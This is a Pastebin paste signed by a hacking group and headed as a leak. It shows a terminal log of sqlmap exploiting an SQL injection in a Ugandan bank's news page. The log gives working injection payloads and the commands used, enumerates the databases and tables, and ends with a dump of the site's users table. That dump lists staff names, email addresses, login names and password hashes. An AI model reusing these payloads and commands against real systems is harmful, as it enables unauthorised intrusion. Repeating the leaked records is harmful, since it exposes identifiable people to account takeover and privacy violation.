API tools faq
paste
yukinoshita47

[LEAKED] Bank of Baroda Uganda Ltd

yukinoshita47
Jul 26th, 2017
226
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.78 KB | None | 0 0
raw download clone embed print report
  1. ########################################################
  2.  
  3. ____ _____ __ __
  4. / | / ___/ | | |
  5. | __| ( \_ | | |
  6. | | | \__ | | _ |
  7. | |_ | / \ | | | |
  8. | | \ | | | |
  9. |___,_| aruda \___| ecurity |__|__| acker
  10.  
  11. LEAKING SOMETHING FUCKING COOL
  12. *****
  13. Date Thursday 27 July 2017
  14.  
  15. Target BANK OF BARODA UGANDA
  16. by Yukinoshita 47
  17.  
  18.  
  19. ############################################################
  20.  
  21. Yukinoshita 47 - Cr4bbyP4tty - _Tuan2Fay_
  22.  
  23. E7B_404 - Lyonc - Fazlast - Mr. Viruzer#29
  24.  
  25. Engkus - Snooze - Sys47ID -
  26.  
  27. And All Member of Garuda Security Hacker
  28.  
  29. blog : http://blog.garudasecurityhacker.org
  30. FB : https://facebook.com/gshofficialpageindonesia
  31.  
  32. ############################################################
  33.  
  34.  
  35. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
  36.  
  37. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  38. http://sqlmap.org
  39.  
  40. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  41.  
  42. [*] starting at 06:33:01
  43.  
  44. [06:33:01] [INFO] resuming back-end DBMS 'mysql'
  45. [06:33:02] [INFO] testing connection to the target URL
  46. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  47. ---
  48. Place: GET
  49. Parameter: detail
  50. Type: boolean-based blind
  51. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  52. Payload: detail=-8074 OR (1732=1732)#
  53.  
  54. Type: error-based
  55. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  56. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  57.  
  58. Type: UNION query
  59. Title: MySQL UNION query (NULL) - 6 columns
  60. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  61. ---
  62. [06:33:05] [INFO] the back-end DBMS is MySQL
  63. web application technology: Apache, PHP 5.3.29
  64. back-end DBMS: MySQL 5.1
  65. [06:33:05] [INFO] fetching database names
  66. [06:33:08] [INFO] the SQL query used returns 3 entries
  67. [06:33:10] [INFO] retrieved: "information_schema"
  68. [06:33:13] [INFO] retrieved: "tampco_bobDb"
  69. [06:33:15] [INFO] retrieved: "tampco_webnet"
  70. available databases [3]:
  71. [*] information_schema
  72. [*] tampco_bobDb
  73. [*] tampco_webnet
  74.  
  75. [06:33:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  76.  
  77. [*] shutting down at 06:33:15
  78.  
  79. root@yukinoshita47:~# ^C
  80. root@yukinoshita47:~# clear
  81.  
  82. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
  83.  
  84. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  85. http://sqlmap.org
  86.  
  87. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  88.  
  89. [*] starting at 06:34:14
  90.  
  91. [06:34:15] [INFO] resuming back-end DBMS 'mysql'
  92. [06:34:15] [INFO] testing connection to the target URL
  93. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  94. ---
  95. Place: GET
  96. Parameter: detail
  97. Type: boolean-based blind
  98. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  99. Payload: detail=-8074 OR (1732=1732)#
  100.  
  101. Type: error-based
  102. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  103. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  104.  
  105. Type: UNION query
  106. Title: MySQL UNION query (NULL) - 6 columns
  107. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  108. ---
  109. [06:34:18] [INFO] the back-end DBMS is MySQL
  110. web application technology: Apache, PHP 5.3.29
  111. back-end DBMS: MySQL 5.1
  112. [06:34:18] [INFO] fetching database names
  113. [06:34:18] [INFO] the SQL query used returns 3 entries
  114. [06:34:18] [INFO] resumed: "information_schema"
  115. [06:34:18] [INFO] resumed: "tampco_bobDb"
  116. [06:34:18] [INFO] resumed: "tampco_webnet"
  117. available databases [3]:
  118. [*] information_schema
  119. [*] tampco_bobDb
  120. [*] tampco_webnet
  121.  
  122. [06:34:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  123.  
  124. [*] shutting down at 06:34:18
  125.  
  126. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --tables
  127. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  128. http://sqlmap.org
  129.  
  130. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  131.  
  132. [*] starting at 06:35:16
  133.  
  134. [06:35:16] [INFO] resuming back-end DBMS 'mysql'
  135. [06:35:16] [INFO] testing connection to the target URL
  136. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  137. ---
  138. Place: GET
  139. Parameter: detail
  140. Type: boolean-based blind
  141. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  142. Payload: detail=-8074 OR (1732=1732)#
  143.  
  144. Type: error-based
  145. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  146. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  147.  
  148. Type: UNION query
  149. Title: MySQL UNION query (NULL) - 6 columns
  150. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  151. ---
  152. [06:35:20] [INFO] the back-end DBMS is MySQL
  153. web application technology: Apache, PHP 5.3.29
  154. back-end DBMS: MySQL 5.1
  155. [06:35:20] [INFO] fetching tables for database: 'tampco_webnet'
  156. [06:35:23] [INFO] the SQL query used returns 11 entries
  157. [06:35:25] [INFO] retrieved: "annual_report"
  158. [06:35:27] [INFO] retrieved: "app_category"
  159. [06:35:29] [INFO] retrieved: "application_form"
  160. [06:35:31] [INFO] retrieved: "currency_category"
  161. [06:35:33] [INFO] retrieved: "exchange_rate"
  162. [06:35:35] [INFO] retrieved: "new_event"
  163. [06:35:36] [INFO] retrieved: "photo_category"
  164. [06:35:38] [INFO] retrieved: "photo_gallary"
  165. [06:35:41] [INFO] retrieved: "rpt_category"
  166. [06:35:43] [INFO] retrieved: "share_price"
  167. [06:35:45] [INFO] retrieved: "users"
  168. Database: tampco_webnet
  169. [11 tables]
  170. +-------------------+
  171. | annual_report |
  172. | app_category |
  173. | application_form |
  174. | currency_category |
  175. | exchange_rate |
  176. | new_event |
  177. | photo_category |
  178. | photo_gallary |
  179. | rpt_category |
  180. | share_price |
  181. | users |
  182. +-------------------+
  183.  
  184. [06:35:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  185.  
  186. [*] shutting down at 06:35:45
  187.  
  188. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --columns
  189.  
  190. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  191. http://sqlmap.org
  192.  
  193. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  194.  
  195. [*] starting at 06:37:32
  196.  
  197. [06:37:32] [INFO] resuming back-end DBMS 'mysql'
  198. [06:37:32] [INFO] testing connection to the target URL
  199. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  200. ---
  201. Place: GET
  202. Parameter: detail
  203. Type: boolean-based blind
  204. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  205. Payload: detail=-8074 OR (1732=1732)#
  206.  
  207. Type: error-based
  208. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  209. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  210.  
  211. Type: UNION query
  212. Title: MySQL UNION query (NULL) - 6 columns
  213. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  214. ---
  215. [06:38:05] [INFO] the back-end DBMS is MySQL
  216. web application technology: Apache, PHP 5.3.29
  217. back-end DBMS: MySQL 5.1
  218. [06:38:05] [INFO] fetching tables for database: 'tampco_webnet'
  219. [06:38:06] [INFO] the SQL query used returns 11 entries
  220. [06:38:06] [INFO] resumed: "annual_report"
  221. [06:38:06] [INFO] resumed: "app_category"
  222. [06:38:06] [INFO] resumed: "application_form"
  223. [06:38:06] [INFO] resumed: "currency_category"
  224. [06:38:06] [INFO] resumed: "exchange_rate"
  225. [06:38:06] [INFO] resumed: "new_event"
  226. [06:38:06] [INFO] resumed: "photo_category"
  227. [06:38:06] [INFO] resumed: "photo_gallary"
  228. [06:38:06] [INFO] resumed: "rpt_category"
  229. [06:38:06] [INFO] resumed: "share_price"
  230. [06:38:06] [INFO] resumed: "users"
  231. [06:38:06] [INFO] fetching columns for table 'app_category' in database 'tampco_webnet'
  232. [06:38:08] [INFO] the SQL query used returns 2 entries
  233. [06:38:10] [INFO] retrieved: "app_cat_id","int(3)"
  234. [06:38:12] [INFO] retrieved: "app_category","varchar(30)"
  235. [06:38:13] [INFO] fetching columns for table 'photo_category' in database 'tampco_webnet'
  236. [06:38:15] [INFO] the SQL query used returns 2 entries
  237. [06:38:17] [INFO] retrieved: "cat_id","int(3)"
  238. [06:38:18] [INFO] retrieved: "pic_category","varchar(30)"
  239. [06:38:18] [INFO] fetching columns for table 'rpt_category' in database 'tampco_webnet'
  240. [06:38:20] [INFO] the SQL query used returns 2 entries
  241. [06:38:23] [INFO] retrieved: "rept_cat_id","int(3)"
  242. [06:38:25] [INFO] retrieved: "rpt_category","varchar(30)"
  243. [06:38:25] [INFO] fetching columns for table 'photo_gallary' in database 'tampco_webnet'
  244. [06:38:58] [INFO] the SQL query used returns 5 entries
  245. [06:39:00] [INFO] retrieved: "pic_id","int(3)"
  246. [06:39:02] [INFO] retrieved: "cat_id","int(3)"
  247. [06:39:05] [INFO] retrieved: "picture","varchar(200)"
  248. [06:39:07] [INFO] retrieved: "d_desc","text"
  249. [06:39:09] [INFO] retrieved: "date_taken","date"
  250. [06:39:09] [INFO] fetching columns for table 'annual_report' in database 'tampco_webnet'
  251. [06:39:11] [INFO] the SQL query used returns 5 entries
  252. [06:39:14] [INFO] retrieved: "rept_id","int(3)"
  253. [06:39:15] [INFO] retrieved: "rept_cat_id","int(3)"
  254. [06:39:17] [INFO] retrieved: "title","varchar(100)"
  255. [06:39:19] [INFO] retrieved: "report","varchar(200)"
  256. [06:39:21] [INFO] retrieved: "rept_date","date"
  257. [06:39:21] [INFO] fetching columns for table 'currency_category' in database 'tampco_webnet'
  258. [06:39:24] [INFO] the SQL query used returns 2 entries
  259. [06:39:26] [INFO] retrieved: "currency_code","int(3)"
  260. [06:39:28] [INFO] retrieved: "currency_name","varchar(50)"
  261. [06:39:28] [INFO] fetching columns for table 'exchange_rate' in database 'tampco_webnet'
  262. [06:40:01] [INFO] the SQL query used returns 7 entries
  263. [06:40:03] [INFO] retrieved: "ex_rate_id","int(3)"
  264. [06:40:05] [INFO] retrieved: "currency_code","int(3)"
  265. [06:40:07] [INFO] retrieved: "ex_rate","float"
  266. [06:40:09] [INFO] retrieved: "selling_rate","float"
  267. [06:40:11] [INFO] retrieved: "ex_date","text"
  268. [06:40:13] [INFO] retrieved: "ex_time","text"
  269. [06:40:15] [INFO] retrieved: "date_time","timestamp"
  270. [06:40:15] [INFO] fetching columns for table 'new_event' in database 'tampco_webnet'
  271. [06:40:48] [INFO] the SQL query used returns 6 entries
  272. [06:40:50] [INFO] retrieved: "n_id","int(4)"
  273. [06:40:53] [INFO] retrieved: "avenue","varchar(100)"
  274. [06:40:55] [INFO] retrieved: "e_desc","text"
  275. [06:40:57] [INFO] retrieved: "e-link","text"
  276. [06:40:58] [INFO] retrieved: "event_date","text"
  277. [06:41:00] [INFO] retrieved: "archive","tinyint(1)"
  278. [06:41:00] [INFO] fetching columns for table 'share_price' in database 'tampco_webnet'
  279. [06:41:02] [INFO] the SQL query used returns 3 entries
  280. [06:41:05] [INFO] retrieved: "share_date","date"
  281. [06:41:07] [INFO] retrieved: "amount","float"
  282. [06:41:10] [INFO] retrieved: "share_time","timestamp"
  283. [06:41:10] [INFO] fetching columns for table 'application_form' in database 'tampco_webnet'
  284. [06:41:12] [INFO] the SQL query used returns 5 entries
  285. [06:41:45] [INFO] retrieved: "app_id","int(3)"
  286. [06:41:47] [INFO] retrieved: "app_cat_id","int(3)"
  287. [06:41:49] [INFO] retrieved: "title","varchar(100)"
  288. [06:41:51] [INFO] retrieved: "app_form","varchar(200)"
  289. [06:41:53] [INFO] retrieved: "form_date","date"
  290. [06:41:53] [INFO] fetching columns for table 'users' in database 'tampco_webnet'
  291. [06:41:55] [INFO] the SQL query used returns 10 entries
  292. [06:42:04] [INFO] retrieved: "userid","int(11)"
  293. [06:42:06] [INFO] retrieved: "loginname","varchar(255)"
  294. [06:42:08] [INFO] retrieved: "password","varchar(255)"
  295. [06:42:10] [INFO] retrieved: "temp_pass","varchar(55)"
  296. [06:42:12] [INFO] retrieved: "temp_pass_active","tinyint(1)"
  297. [06:42:14] [INFO] retrieved: "email","varchar(255)"
  298. [06:42:16] [INFO] retrieved: "fname","text"
  299. [06:42:18] [INFO] retrieved: "sname","text"
  300. [06:42:20] [INFO] retrieved: "page_access","text"
  301. [06:42:22] [INFO] retrieved: "Guid","varchar(32)"
  302. Database: tampco_webnet
  303. Table: app_category
  304. [2 columns]
  305. +--------------+-------------+
  306. | Column | Type |
  307. +--------------+-------------+
  308. | app_cat_id | int(3) |
  309. | app_category | varchar(30) |
  310. +--------------+-------------+
  311.  
  312. Database: tampco_webnet
  313. Table: photo_category
  314. [2 columns]
  315. +--------------+-------------+
  316. | Column | Type |
  317. +--------------+-------------+
  318. | cat_id | int(3) |
  319. | pic_category | varchar(30) |
  320. +--------------+-------------+
  321.  
  322. Database: tampco_webnet
  323. Table: rpt_category
  324. [2 columns]
  325. +--------------+-------------+
  326. | Column | Type |
  327. +--------------+-------------+
  328. | rept_cat_id | int(3) |
  329. | rpt_category | varchar(30) |
  330. +--------------+-------------+
  331.  
  332. Database: tampco_webnet
  333. Table: photo_gallary
  334. [5 columns]
  335. +------------+--------------+
  336. | Column | Type |
  337. +------------+--------------+
  338. | cat_id | int(3) |
  339. | d_desc | text |
  340. | date_taken | date |
  341. | pic_id | int(3) |
  342. | picture | varchar(200) |
  343. +------------+--------------+
  344.  
  345. Database: tampco_webnet
  346. Table: annual_report
  347. [5 columns]
  348. +-------------+--------------+
  349. | Column | Type |
  350. +-------------+--------------+
  351. | report | varchar(200) |
  352. | rept_cat_id | int(3) |
  353. | rept_date | date |
  354. | rept_id | int(3) |
  355. | title | varchar(100) |
  356. +-------------+--------------+
  357.  
  358. Database: tampco_webnet
  359. Table: currency_category
  360. [2 columns]
  361. +---------------+-------------+
  362. | Column | Type |
  363. +---------------+-------------+
  364. | currency_code | int(3) |
  365. | currency_name | varchar(50) |
  366. +---------------+-------------+
  367.  
  368. Database: tampco_webnet
  369. Table: exchange_rate
  370. [7 columns]
  371. +---------------+-----------+
  372. | Column | Type |
  373. +---------------+-----------+
  374. | currency_code | int(3) |
  375. | date_time | timestamp |
  376. | ex_date | text |
  377. | ex_rate | float |
  378. | ex_rate_id | int(3) |
  379. | ex_time | text |
  380. | selling_rate | float |
  381. +---------------+-----------+
  382.  
  383. Database: tampco_webnet
  384. Table: new_event
  385. [6 columns]
  386. +------------+--------------+
  387. | Column | Type |
  388. +------------+--------------+
  389. | e-link | text |
  390. | archive | tinyint(1) |
  391. | avenue | varchar(100) |
  392. | e_desc | text |
  393. | event_date | text |
  394. | n_id | int(4) |
  395. +------------+--------------+
  396.  
  397. Database: tampco_webnet
  398. Table: share_price
  399. [3 columns]
  400. +------------+-----------+
  401. | Column | Type |
  402. +------------+-----------+
  403. | amount | float |
  404. | share_date | date |
  405. | share_time | timestamp |
  406. +------------+-----------+
  407.  
  408. Database: tampco_webnet
  409. Table: application_form
  410. [5 columns]
  411. +------------+--------------+
  412. | Column | Type |
  413. +------------+--------------+
  414. | app_cat_id | int(3) |
  415. | app_form | varchar(200) |
  416. | app_id | int(3) |
  417. | form_date | date |
  418. | title | varchar(100) |
  419. +------------+--------------+
  420.  
  421. Database: tampco_webnet
  422. Table: users
  423. [10 columns]
  424. +------------------+--------------+
  425. | Column | Type |
  426. +------------------+--------------+
  427. | email | varchar(255) |
  428. | fname | text |
  429. | Guid | varchar(32) |
  430. | loginname | varchar(255) |
  431. | page_access | text |
  432. | password | varchar(255) |
  433. | sname | text |
  434. | temp_pass | varchar(55) |
  435. | temp_pass_active | tinyint(1) |
  436. | userid | int(11) |
  437. +------------------+--------------+
  438.  
  439. [06:42:22] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  440.  
  441. [*] shutting down at 06:42:22
  442.  
  443. root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet -T users -C email,fname,loginname,page_access,password,userid --dump
  444.  
  445. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  446. http://sqlmap.org
  447.  
  448. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  449.  
  450. [*] starting at 06:45:15
  451.  
  452. [06:45:16] [INFO] resuming back-end DBMS 'mysql'
  453. [06:45:16] [INFO] testing connection to the target URL
  454. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  455. ---
  456. Place: GET
  457. Parameter: detail
  458. Type: boolean-based blind
  459. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  460. Payload: detail=-8074 OR (1732=1732)#
  461.  
  462. Type: error-based
  463. Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
  464. Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
  465.  
  466. Type: UNION query
  467. Title: MySQL UNION query (NULL) - 6 columns
  468. Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
  469. ---
  470. [06:45:19] [INFO] the back-end DBMS is MySQL
  471. web application technology: Apache, PHP 5.3.29
  472. back-end DBMS: MySQL 5.1
  473. [06:45:19] [INFO] fetching columns 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
  474. [06:45:22] [INFO] the SQL query used returns 6 entries
  475. [06:45:24] [INFO] retrieved: "userid","int(11)"
  476. [06:45:26] [INFO] retrieved: "loginname","varchar(255)"
  477. [06:45:28] [INFO] retrieved: "password","varchar(255)"
  478. [06:45:30] [INFO] retrieved: "email","varchar(255)"
  479. [06:45:32] [INFO] retrieved: "fname","text"
  480. [06:45:35] [INFO] retrieved: "page_access","text"
  481. [06:45:35] [INFO] fetching entries of column(s) 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
  482. [06:45:37] [INFO] the SQL query used returns 7 entries
  483. [06:45:39] [INFO] retrieved: "info@bankofbaroda.ug","Administrator","admin","forex admin,forex,shares,news,ph...
  484. [06:45:41] [INFO] retrieved: "kaitesi.maureen@yahoo.com","Maureen","mkaitesi","forex admin,forex,shares,news,...
  485. [06:45:44] [INFO] retrieved: "it.uganda@bankofbaroda.com","admin3","admin3","forex admin,forex,shares,news,ph...
  486. [06:45:45] [INFO] retrieved: "mahesharora@india.com","Mahesh","arora","forex admin,forex,shares,news,photos,u...
  487. [06:45:48] [INFO] retrieved: "treasury.uganda@bankofbaroda.com","Prithwijit","pg075512","forex admin,forex","...
  488. [06:45:50] [INFO] retrieved: "bcm.uganda@bankofbaroda.co.in","Anand","ak072078","shares,photos","1f96b0dcb9a8...
  489. [06:45:52] [INFO] retrieved: "deepcreep09.avinash@gmail.com","AVINASH","as075402","shares,news,photos","b281b...
  490. [06:45:52] [INFO] analyzing table dump for possible password hashes
  491. Database: tampco_webnet
  492. Table: users
  493. [7 entries]
  494. +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
  495. | userid | fname | email | password | loginname | page_access |
  496. +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
  497. | 9 | Administrator | info@bankofbaroda.ug | 1d85133082902eff839f2e8cb9fd29511 | admin | forex admin,forex,shares,news,photos,users |
  498. | 24 | Maureen | kaitesi.maureen@yahoo.com | dfc639cce1e77c49a91480c1e6d0d3c01 | mkaitesi | forex admin,forex,shares,news,photos,users |
  499. | 35 | admin3 | it.uganda@bankofbaroda.com | 8eb0a372b1a9865b326c05b33a18b8981 | admin3 | forex admin,forex,shares,news,photos,users |
  500. | 36 | Mahesh | mahesharora@india.com | fdfdfeaa6e6764b5dc9dfd2895f6652311 | arora | forex admin,forex,shares,news,photos,users |
  501. | 28 | Prithwijit | treasury.uganda@bankofbaroda.com | b56e0b4ea4962283bee762525c2d490f1 | pg075512 | forex admin,forex |
  502. | 38 | Anand | bcm.uganda@bankofbaroda.co.in | 1f96b0dcb9a80d10a36be4d92a31830f1 | ak072078 | shares,photos |
  503. | 37 | AVINASH | deepcreep09.avinash@gmail.com | b281b23c80f21188bc302987b9a558841 | as075402 | shares,news,photos |
  504. +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
  505.  
  506. [06:45:52] [INFO] table 'tampco_webnet.users' dumped to CSV file '/usr/share/sqlmap/output/www.bankofbaroda.ug/dump/tampco_webnet/users.csv'
  507. [06:45:52] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
  508.  
  509. [*] shutting down at 06:45:52
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!